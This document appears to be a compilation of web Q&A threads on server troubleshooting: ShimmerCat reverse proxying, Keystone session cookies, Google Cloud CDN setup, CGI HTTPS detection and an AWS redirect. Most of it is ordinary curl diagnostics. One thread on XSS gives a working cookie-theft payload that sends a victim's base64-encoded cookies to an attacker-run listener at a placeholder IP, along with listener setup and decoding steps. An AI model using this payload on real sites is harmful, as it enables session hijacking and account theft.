ShimmerCat with reverse proxy when using "the old way" - Django

I have used ShimmerCat with sc-tool to connect to my development sites as described here, and everything has always worked like a charm. But I also wanted to follow the "old way" and configure my /etc/hosts. In this case I ran into a small problem: the server runs fine, and I can access my development site (let's say at https://www.example.com:4043/), but I'm also using a reverse proxy, as described in this article and in the config file reference, which forwards requests to a Django app I'm using. This is my devlove.yaml config file:
---
shimmercat-devlove:
    domains:
        www.example.com:
            root-dir: site
            consultant: 8080
            cache-key: xxxxxxx
        api.example.com:
            port: 8080
The problem is that when I access a URL that makes a request to the API, the API responds with a 404. Let me explain with an example. I open https://www.example.com:4043/country/, and that page makes a request to the API at /api/<country>/towns/; the API endpoint returns a 404, so it is not finding this URL. This does not happen when using Google Chrome with sc-tool. I have set both domains, www.example.com and api.example.com, in my /etc/hosts. I have been trying to solve this without any luck. Is there something I'm missing? Any help will be welcome. Thanks in advance.
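For reference, the page's API call can be reproduced from the command line; depending on how the front-end builds the URL it goes to one of these (France is just a placeholder country value, and -k skips verification of the development certificate):
# Same path the page requests, against either domain
curl -k https://www.example.com:4043/api/France/towns/
curl -k https://api.example.com:4043/api/France/towns/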

With a bit more data, we may be able to find the issue. In the meantime, here is a list of troubleshooting tips:
Possible issue: DNS is cached in the browser, so /etc/hosts is not being used (yet)
This can happen if your browser has not done a fresh DNS lookup since you changed your /etc/hosts file. In that case the connection goes to a host on the Internet that may not have the API endpoint you are calling.
Troubleshooting: Check ShimmerCat's log for the requests. If this is the issue, closing and re-opening the browser may solve it.
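You can also double-check the mapping outside the browser; on a Linux machine, for example, a quick lookup should print the address you put in /etc/hosts:
# Both names should resolve to the address from /etc/hosts
getent hosts www.example.com
getent hosts api.example.com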
Possible issue: the host header is incorrect
ShimmerCat uses the Host header in HTTP/1.1 requests and the :authority header in HTTP/2 requests to distinguish the domains. It always discards any port number present in them. If these headers are not set, or are set to a domain other than the ones ShimmerCat is configured to listen for, the server will consider the situation so despicable that it will just close the connection.
Troubleshooting: This is not a 404, but a closed connection (if connecting un-proxied, directly to the SSL port where ShimmerCat is listening), or a "Socks Connection Failed" (if connecting through ShimmerCat's built-in SOCKS5 proxy). In the former case, the server will print the message "Rejected request to Just https://some-domain-or-ip/some/path" in its log, using the actual value of the domain, or "Rejected request to Nothing" if no header was present. The second case is more complicated, because the SOCKS5 proxy sits in front of the HTTP routing logic.
In any case, the browser will put a red line in the network panel of the developer tools. If you are accessing the server using curl, like this:
curl -k -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
or like this:
curl -k --http2 -H host:api.incorrect-domain.com https://127.0.0.1:4043/contents/blog/data-density/
(notice the --http2 parameter in the second form). In either case, you will get a response like:
curl: (56) Unexpected EOF
Extra tip: there is a field for the network address in the browser's developer tools. Check it; it may tell you something!
Possible issue: something gets messed up when passing the request to the API back-end.
API backends are also sensitive to the host header, and to additional things like authentication cookies and request parameters.
Troubleshooting: A way to diagnose this is to invoke ShimmerCat with the --show-proxied-headers command-line option. It makes ShimmerCat report the proxied headers in the log:
Issuing request with headers :authority: api.example.com
:method: GET
:path: /my/api/endpoint/path/
:scheme: https
accept: */*
user-agent: curl/7.47.0
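It can also help to take ShimmerCat out of the equation and send the same request straight to the back-end consultant port (8080 in the configuration above), with the Host header the back-end expects; if the Django app still answers 404, the problem is in its URL configuration rather than in the proxying. The path below is just a hypothetical example:
# Talk to the Django back-end directly, bypassing ShimmerCat
curl -i -H "Host: api.example.com" http://127.0.0.1:8080/api/France/towns/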
Possible issue: there are two or more instances of ShimmerCat running
...and they are using different configurations. ShimmerCat uses port sharing among several processes to increase availability. A downside of this is that it is perfectly possible to mistakenly start ShimmerCat, forget to stop it, and start it again after changing some bit of configuration. The two instances will be running at the same time, and either of them may pick up connections made to the listening port.
Troubleshooting: Shut down all instances of ShimmerCat, double-check that none are left running with the corresponding form of the ps command, and start the server again with the configuration you want.
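For example, on Linux something along these lines does the job (adjust the pattern if your binary has a different name):
# List any ShimmerCat processes still running; the [s] keeps grep from matching itself
ps aux | grep '[s]himmercat'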

Keystone session cookie only working on localhost

Edit:
After investigating this further, it seems cookies are sent correctly with most API requests. However, something happens in the specific request that checks whether the user is logged in: it always returns null. When refreshing the browser, a successful preflight request is sent and nothing else, even though there is a session and a valid session cookie.
Original question:
I have a NextJS frontend authenticating against a Keystone backend.
When running on localhost, I can log in and then refresh the browser without getting logged out, i.e. the browser reads the cookie correctly.
When the application is deployed on an external server, I can still log in, but when refreshing the browser it seems no cookie is found and it is as if I'm logged out. However if I then go to the Keystone admin UI, I am still logged in.
In the browser settings, I can see that for localhost there is a "keystonejs-session" cookie being created. This is not the case for the external server.
Here are the session settings from the Keystone config file.
The value of process.env.DOMAIN on the external server would be for example example.com when Keystone is deployed to admin.example.com. I have also tried .example.com, with a leading dot, with the same result. (I believe the leading dot is ignored in newer specifications.)
import { statelessSessions } from '@keystone-6/core/session';

const sessionConfig = {
  maxAge: 60 * 60 * 24 * 30,
  secret: process.env.COOKIE_SECRET,
  sameSite: 'lax',
  secure: true,
  domain: process.env.DOMAIN,
  path: "/",
};
const session = statelessSessions(sessionConfig);
(The session object is then passed to the config function from @keystone-6/core.)
Current workaround:
I'm currently using a workaround which involves routing all API requests to '/api/graphql' and rewriting that request to the real URL using Next's own rewrites. Someone recommended this might work and it does, sort of. When refreshing the browser window the application is still in a logged-out state, but after a second or two the session is validated.
To use this workaround, add the following rewrite directive to next.config.js:
rewrites: () => [
  {
    source: '/api/graphql',
    destination:
      process.env.NODE_ENV === 'development'
        ? `http://localhost:3000/api/graphql`
        : process.env.NEXT_PUBLIC_BACKEND_ENDPOINT,
  },
],
Then make sure you use this URL for queries. In my case that's the URL I feed to createUploadLink().
This workaround still means constant error messages in the logs since relative URLs are not supposed to work. I would love to see a proper solution!
It's hard to know what's happening for sure without knowing more about your setup. Inspecting the requests and responses your browser is making may help you figure this out. Look in the "Network" tab of your browser dev tools. When you make the request to sign in, you should see the cookie being set in the headers of the response.
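If you prefer the command line, here is a sketch of the same check with curl, assuming the stock createAuth setup where sign-in goes through the authenticateUserWithPassword mutation (the URL, identity field and credentials are placeholders for your own):
# -i prints the response headers; look for a "Set-Cookie: keystonejs-session=..." line
curl -i https://admin.example.com/api/graphql \
  -H 'Content-Type: application/json' \
  --data '{"query":"mutation { authenticateUserWithPassword(email: \"me@example.com\", password: \"secret\") { __typename } }"}'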
Some educated guesses:
Are you accessing your external server over HTTPS?
The Keystone docs for the session API mention that, when setting secure to true...
[...] the cookie is only sent to the server when a request is made with the https: scheme (except on localhost)
So, if you're running your deployed environment over plain HTTP, the cookie is never set, which creates the behaviour you're describing. Somewhat confusingly, the flag is ignored on localhost, which is why it works in development.
A similar thing can happen if you're deploying behind a proxy, like nginx:
In this scenario, a lot of people choose to have the proxy terminate the TLS connection, so requests are forwarded to the backend over HTTP (but on a private network, so still relatively secure). In that case, you need to do two things:
Ensure the proxy is configured to forward the X-Forwarded-Proto header, which tells the backend which protocol was used in the original request
Tell Express to trust what the proxy is saying by configuring the trust proxy setting
I did a write up of this proxy issue a while back. It's for Keystone 5 (so some of the details are off) but, if you're using a reverse proxy, most of it's still relevant.
Update
From Simon's comment, the above guesses missed the mark 😭 but I'll leave them here in case they help others.
Since posting about this issue a month ago I was actually able to work around it by routing API requests via a relative path like '/api/graphql' and then forwarding that request to the real API on a separate subdomain. For some mysterious reason it works this way.
This is starting to sound like a CORS issue.
If you want to serve your front end from a different origin (domain) than the API, the API needs to return a specific header to allow this. Read up on CORS and the Access-Control-Allow-Origin header. You can configure this by setting the cors option in the Keystone server config, which Keystone uses to configure the cors package.
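You can see what the API currently answers to a cross-origin request by simulating the browser's preflight from the command line (the two domains below are placeholders for your front-end and API origins):
# Look for Access-Control-Allow-Origin, and Access-Control-Allow-Credentials since cookies are involved
curl -i -X OPTIONS https://admin.example.com/api/graphql \
  -H 'Origin: https://www.example.com' \
  -H 'Access-Control-Request-Method: POST' \
  -H 'Access-Control-Request-Headers: content-type'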
Alternatively, the solution of proxying API requests via the Next app should also work. It's not obvious to me why your proxying "workaround" is experiencing problems.

Cannot setup Google Cloud CDN for an external website?

I am following the instructions at https://cloud.google.com/cdn/docs/setting-up-cdn-with-ex-backend-internet-neg and https://medium.com/the-innovation/how-to-enable-google-cdn-for-custom-origin-websites-google-cdn-for-external-websites-56e3fe66cca9 to setup Google Cloud CDN for my website www.datanumen.org.
For the "Fully qualified domain name and port" in "New network endpoint", I choose www.datanumen.org.
Everything else is the same as in the above two articles; I use the HTTP protocol for all communications. Finally I get a frontend IP address, 34.96.69.82. So I try to visit http://34.96.69.82/, but I get a default "SORRY" web page instead of the contents of www.datanumen.org. Why?
Also, later I plan to update the DNS A record for www.datanumen.org so that it points to 34.96.69.82 instead of its current IP address. Since what I put in "Fully qualified domain name and port" in "New network endpoint" is www.datanumen.org, I am curious whether that would cause the following infinite loop:
A user visits www.datanumen.org.
Based on the DNS A record, he goes to 34.96.69.82 (the frontend).
The frontend requests data from the backend, and the endpoint is www.datanumen.org.
Based on the DNS A record, the backend endpoint also resolves to 34.96.69.82.
Would this loop forever?
Update:
For the first question, I found the solution. My website is hosted on a server with a shared IP. The article https://cloud.google.com/cdn/docs/setting-up-cdn-with-ex-backend-internet-neg asks me to add a "Host" field to the request header, which is used to identify the actual site to be accessed when the request reaches the origin server. In my previous configuration I thought this step was unnecessary, so I skipped it. After adding the "Host" field, I can now visit my website properly with the IP address given by Google.
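For anyone who runs into the same thing: an explicit Host header with curl is a quick way to see what a shared-IP origin answers for a given site name, here against the frontend IP from above:
# Ask only for the response headers; the Host header tells the origin which site is meant
curl -sI -H "Host: www.datanumen.org" http://34.96.69.82/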
You already fixed your first issue, so you're at a point where you can successfully access your site using an IP address.
Right now all you need is CDN enabled - if it isn't, you can enable it in the "backend" section of the "load balancing" page.
Have a look also at the Network Endpoint Groups documentation to see how to create a load balancer utilising them (the only way to use GCP's CDN for an external site).
To answer your second question - there will be no loop - your site works properly.
Since you're not using HTTPS (only HTTP), you don't have to worry about SSL certificates, and the only thing that remains is to point your domain to your load balancer's IP - then you're done.
If you encounter any issues or just want to check if CDN is working correctly then have a look at CDN troubleshooting page.
The simplest way to verify that it's working is to use curl: curl -s -D - -o /dev/null http://example.com/style.css and see if a Cache-Control line is present in the output:
HTTP/1.1 200 OK
Date: Tue, 16 Feb 2016 12:00:31 GMT
Content-Type: text/css
Content-Length: 1977
Cache-Control: max-age=86400,public
Via: 1.1 google
However, I recommend using HTTPS and SSL certificates for security reasons - it makes it much harder to spoof or listen in on the traffic between the site and the client. It's not mandatory though.

XSS Attack without Web Hosting

I am learning about XSS attacks.
Suppose I have a website (let's call it http://www.animallover.com) which allows me to enter anything into a search bar to search for animal names. The website is vulnerable, as entering <script>alert(1)</script> into the search bar triggers an alert.
My goal is to steal the user's cookie by asking the user to visit http://www.animallover.com.
I don't have a web server to host my cookie-capture script.
What should I do?
You can set up an HTTP server on your own computer quite easily.
For example, Python 3 supports the following one-liner HTTP server:
python -m http.server 8000
This will respond to HTTP requests arriving at port 8000 on your system. Bear in mind that you might need to adjust your firewall and set up port forwarding on your router to allow traffic through to this port. And make sure you enter this command inside an empty folder, as everything inside it will be published on the internet.
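Once it's running, it's worth confirming the listener is actually reachable from outside your own network before building the payload; a plain request from another machine (or a phone off your wifi) is enough (YOUR_PUBLIC_IP stands for your public address):
# If this reaches the listener, a line for it appears in the server's terminal
curl http://YOUR_PUBLIC_IP:8000/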
All incoming requests will be logged on the command line terminal. So if you're trying to fetch an admin's cookie value, you could create a link like this (I'm assuming here that your IP address is 12.34.56.78; you can get the correct value from Google):
http://example.com/search?q=%3Cscript%3Elocation.href%3D%27http%3A%2F%2F12.34.56.78%3A8000%2F%3F%27%2Bbtoa%28document.cookie%29%3B%3C%2Fscript%3E
This will run the following script on the target server:
<script>location.href='http://12.34.56.78:8000/?'+btoa(document.cookie);</script>
The cookie value will be base64 encoded, so you'll need to decode that when it arrives. The log output will look something like this:
$ python -m http.server 8000
99.99.99.99 - - [01/Jan/2021 01:23:45] "GET /?dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo= HTTP/1.1" 200 -
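Decoding the captured value is a one-liner; for the request logged above it recovers the original cookie string:
# Decode the base64 payload appended to the request path
echo 'dXNlcj1hZG1pbjsgc2Vzc2lvbl9pZD0xMjM0NTY3OAo=' | base64 -d
# user=admin; session_id=12345678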

How to use CGI to Determine if URL Request is using HTTPS?

I am trying to switch our site from HTTP to HTTPS. In some scenarios we need the site to use HTTP, and at other times HTTPS. I intend to use CGI to determine whether the request is HTTP or HTTPS.
As far as I can tell, JSON requests must match the protocol of the original request. If you request http://example.org, you must call the JSON with http://example.org/file.json. If you request https://example.org/, you must call the JSON with https://example.org/file.json.
Normally, I would use CGI variables to tell me whether the request is HTTP or HTTPS. I can test CGI.HTTPS to see if it is on or off. I can check CGI.SERVER_PORT to see if it is 80 or 443. I can check CGI.SERVER_PORT_SECURE to see if it is 0 or 1.
When I view our web site in every browser, I can dump the CGI variables and get what I expect 100% of the time.
When a few other people in our office and outside our office make the same request, they get CGI variable values that suggest their request is NOT secure. CGI.HTTPS shows off. CGI.SERVER_PORT shows 80. CGI.SERVER_PORT_SECURE shows 0. Every other indicator shows that the site is secure in every browser, but the CGI variable values say it's not secure.
The site behaves flawlessly 100% for everyone for dev and stage. Only in live, which is behind a load balancer, does this issue exist (for some people).
Is this a load balancer issue? Is it a certificate settings issue? Why are my CGI variables lying to me? How can I work around this?
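For reference, this is the kind of minimal CGI script I can drop in to compare what the server sees for my requests against what it sees for the affected users - a sketch that assumes the server can execute shell CGI scripts, and that a load balancer terminating TLS would add something like an X-Forwarded-Proto header:
#!/bin/sh
# dump-proto.cgi - print the variables that indicate whether the original request was secure
echo "Content-Type: text/plain"
echo ""
env | grep -iE 'HTTPS|SERVER_PORT|FORWARDED'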

AWS VPC instance doesn't resolve public DNS name

The problem:
My URL xyz.co is getting resolved into an ugly AWS public DNS name such as ec2-11-22-33-44.ap-southeast-2.compute.amazonaws.com. It doesn't stick to xyz.co.
Here's what I did:
I have set up my Route 53 configuration according to http://docs.aws.amazon.com/Route53/latest/DeveloperGuide/MigratingDNS.html, so I created an A record pointing to the IP address and a CNAME alias record to allow for www.xyz.co. The domain is registered with GoDaddy and the name servers are configured to the AWS delegation set.
The instance itself sits in the default VPC. I double-checked and DNS resolution and DNS host names are both active.
I'm a bit stuck here with this. Any help would be highly appreciated!
Cheers,
Bruno
What you are seeing isn't actually related to name resolution.
It's impossible for DNS to change what appears in the address bar of the web browser -- DNS and web browsers simply do not interact in a way that makes such behavior possible. Your URL is not "getting resolved to" this new value via anything DNS-related, since DNS, configured correctly or incorrectly, can't impact what shows up there, on its own.
The fact that navigating to the IP address has the same impact backs up this assertion.
What you are seeing is not related in any way to DNS or Route 53 or even EC2 or VPC. Your web server is, for whatever reason, configured to redirect incoming requests with any other hostname... over to the hostname you are subsequently seeing in the address bar (which is the one you don't like).
You should notice this in your web server's log. It will be issuing a 301 or 302 redirect on the initial request.
You should also be able to verify this yourself with the curl command line utility. Here, a server accessed as "www.example.com" is redirecting the browser to use its preferred address, "example.com." (Hostnames and addresses are sanitized, but the output is otherwise unmodified.)
$ curl -v www.example.com
* Rebuilt URL to: www.example.com/
* Hostname was NOT found in DNS cache
* Trying 203.0.113.139...
* Connected to www.example.com (203.0.113.139) port 80 (#0)
The next block of output is the request sent to the web server.
> GET / HTTP/1.1
> User-Agent: curl/7.35.0
> Host: www.example.com
> Accept: */*
>
The HTTP response from the web server includes a redirect.
< HTTP/1.1 301 Moved Permanently
< Content-length: 0
< Location: http://example.com/
< Connection: close
<
* Closing connection 0
If we were using a browser instead of a command line tool, this would cause the address bar to change to the new value, and establish a new connection to the web server (which might actually be the same one, or a different one... in this case, it's the same).
In spite of the fact that I had typed http://www.example.com into my browser, it would now show only http://example.com/. The same thing would happen if I typed in the IP address if my server was configured to redirect everything to one hostname, as yours appears to be. In my case, it's deliberately configured to do something else.
The above should illustrate that you do not actually have a DNS issue, and explain the mechanism that's causing this to occur (because you may find this to be something useful to do deliberately in the future, as my web servers do -- any www.* request gets stripped and rewritten without the www).
The issue is with your web server, telling the browser to use a different hostname. How to fix that will depend on what web server you are running and why it thinks the redirect is necessary.
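A quick way to find the redirect and the hostname it points at is to ask for just the response headers (substitute your own domain):
# -I asks for headers only; the Location: header shows where the server sends the browser
curl -sI http://xyz.co/ | grep -iE '^(HTTP|Location)'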